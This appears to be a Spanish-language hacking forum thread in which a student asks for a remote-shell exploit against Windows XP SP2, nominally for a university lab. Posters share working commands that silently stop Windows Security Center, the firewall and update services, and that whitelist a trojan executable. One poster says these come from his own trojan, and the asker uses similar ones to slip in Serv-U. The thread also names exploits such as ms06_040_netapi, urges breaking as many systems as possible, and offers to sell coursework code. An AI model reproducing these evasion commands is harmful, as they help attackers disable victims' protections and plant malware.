Tema destacado: Recuperar cuenta de Google, GMail, Youtube
 Autor
|
Tema: exploit Windows XP SP2 (Leído 8,605 veces)
|
pablopezg
 Desconectado
Mensajes: 8
|
Hola a tod@s,
Tengo un problema, y es que necesito un exploit con el que pueda obtener una shell remota en Windows XP SP2. He estado intentando varias cosas que he visto en el foro y no he conseguido obtenerla. La ventaja que tengo, es que puedo instalar cualquier programa en esa máquina para poder explotar algún fallo de éste.
Si me pudieseis echar una mano os lo agradecería, es para una práctica de universidad.
Saludos
|
|
|
|
|
En línea
|
|
|
|
Thunder2k
Desconectado
Mensajes: 559
|
Hola pablopezg,
Intenta darnos un poquito mas de informacion para que podamos ayudarte acerca del equipo, que servicios corren, software, caracteristicas, etc..
Saludos
|
|
|
|
|
En línea
|
Thunder2k was here
|
|
|
pablopezg
Desconectado
Mensajes: 8
|
a eso es a lo que me referia, tengo total libertad para instalar los procesos o programas que yo quiera, la única obligación es que al que ataque tenga instalado el SP2, es simplemente para una practica de clase
Gracias
|
|
|
|
|
En línea
|
|
|
|
Rozor
Desconectado
Mensajes: 269
As I Walk Through The Valley Of The Shadow Of Dead
|
usa el tftpd32 que es facil de explotar.
|
|
|
|
|
En línea
|
out in the streets they call it murder....
|
|
|
|
|
Rozor
Desconectado
Mensajes: 269
As I Walk Through The Valley Of The Shadow Of Dead
|
Me alegro que la hayas conseguido, has programado el exploit?, respecto a desactivar el firewall hay informacion en el foro, en mi primer troyano me vino bien esa info, te pego las lineas ( obviamente repito esa info salio del foro y me fue de gran utilidad ). system("net stop \"Security Center\"");
system("net stop \"SharedAccess\"");
system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f");
system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wuauserv\" /v Start /t REG_DWORD /d 0x4 /f");
system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f");
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List /v %systemroot\\sytem32\\ladyviky.exe /t REG_SZ /d \"%systemroot%\\system32\\VikTroy.exe:*:Enabled:VikTroy\" /f");
No soy muy partidario de ayudar en el hack, asique paso de quitarte la morralla qu eno funciona, si sabes C eso va en la CMD ( system(.... ) ). PD: Que cutre la forma de hacerlo para un troyano no? X"DDDDDDD si yo hubiese sabido que es la bsod, ssdt etc... en aquel entonces...... :'( XDDDD Bue espero que te sirva y "Revienta el maximo numero de sistemas" . |
|
|
|
« Última modificación: 29 Mayo 2008, 18:52 por Rozor »
|
En línea
|
out in the streets they call it murder....
|
|
|
Rozor
Desconectado
Mensajes: 269
As I Walk Through The Valley Of The Shadow Of Dead
|
por cierto para que asignatura es?.
|
|
|
|
|
En línea
|
out in the streets they call it murder....
|
|
|
pablopezg
Desconectado
Mensajes: 8
|
encontré esto en el foro buscando:
sc stop sharedAccess
reg add hku\S-1-5-21-1957994488-1965331169-839522115-1003\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f
reg add "hkey_local_machine\software\microsoft\Security Center" /v FirewallDisableNotify /t reg_dword /d ""1"" /f
reg add "hkey_local_machine\software\microsoft\Security Center" /v FirewallOverride /t reg_dword /d ""1"" /f
y es lo que he usado para poner de modo silencioso el firewall desabilitado sin que aparezca el aviso de windows diciendo que está desactivado mientras cuelo el serv-u. De todos modos, seguro que hay cosas que sobran y no hacen falta. Si es asi te agradeceria que me lo dijeses y las razones y las diferencias con lo que me has puesto tu, si no es mucho pedir, claro.
Ya había conseguido con el exploit ms06_040_netapi introducirme en una máquina con SP1, pero no me podía quedar ahí, pensando que ya casi nadie lo tiene. De hecho, voy a intentar, si me da tiempo hoy y si no cuando pueda, atacar mediante éste método q explota la vulnerabilidad en iexplore.exe al nuevo SP3, lo cual ya sería la leche.
Es para una asignatura de seguridad de redes que el profesor ha enfocado acertadamente a la práctica, ya que si sólo nos quedásemos en la teoría...
Muchas gracias
|
|
|
|
|
En línea
|
|
|
|
Rozor
Desconectado
Mensajes: 269
As I Walk Through The Valley Of The Shadow Of Dead
|
Ahi me gusta tu estilo, por cierto si no te importase a mas de uno le gustaria que expusieras tu ejerccios aqui y si no por lo menos ami si y de hack..... algo se x"DDDDDDD en cualquier caso me divierte asique si no te importa y por otro lado te vendra bien. Por cierto asi entre tu y yo, pillate mi msn que si tienes compañeros que tienen que entregar codigos 2 dias antes no lo tienen y $$ podemos hacer un apaño  |
|
|
|
|
En línea
|
out in the streets they call it murder....
|
|
|
pablopezg
Desconectado
Mensajes: 8
|
jejeje, la verdad es que puede que vayan un poco apuradillos de tiempo, pero no creo q les de por pagar, jejeje. De todos modos se lo comentare.
|
|
|
|
|
En línea
|
|
|
|
pablopezg
Desconectado
Mensajes: 8
|
bueno, pues conseguido, todo un éxito, luego cuando pueda hago un tuto de cómo lo he conseguido y lo cuelgo para quien lo necesite.
Gracias
|
|
|
|
|
En línea
|
|
|
|
Rozor
Desconectado
Mensajes: 269
As I Walk Through The Valley Of The Shadow Of Dead
|
me alegro que te haya salido bien y te lo hayas pasado bien, el exploit que me pasabas no se si ejecutaba shellcode, lo mire pero no me acuerdo x"DDDD en caso tal podrias hacerte una y añadirle las opciones de desactivar el firewall antes de crear la shell inversa.
|
|
|
|
|
En línea
|
out in the streets they call it murder....
|
|
|
Rozor
Desconectado
Mensajes: 269
As I Walk Through The Valley Of The Shadow Of Dead
|
Haz el favor, esto se supone que es una parte seria del foro, para esas chorradas vete a virus o hacking basico, ademas de aprender cosas, googlear y no querer hacer daño, cuando sabes hacer ciertas cosas puedes aprobecharte alguna vez de ello pero no siempre, sin etica y mucho menos aprender con la intencion de hacer daño Cantao el portatil te la novia, un colega o por pegarte el vacile, un poquito de respeto que hay gente que se lo curra en este foro |
|
|
|
|
En línea
|
out in the streets they call it murder....
|
|
|
leos_79
Desconectado
Mensajes: 189
Anyway, Anyhow, Anywhere
|
dios , quiero ver ingenieria en sistemas , una asignatura asiii , lo que daria por pasar de el analisis matematico a ver cosas de seguridad en redessssss
jaja solo era eso , ese desahogooo jajaja
|
|
|
|
|
En línea
|
|
|
|
perverthso
Desconectado
Mensajes: 25
|
jaja porfa dime enq universidad es porq nunca hice nada parecido en la universidad  saludos |
|
|
|
|
En línea
|
|
|
|
|
 |
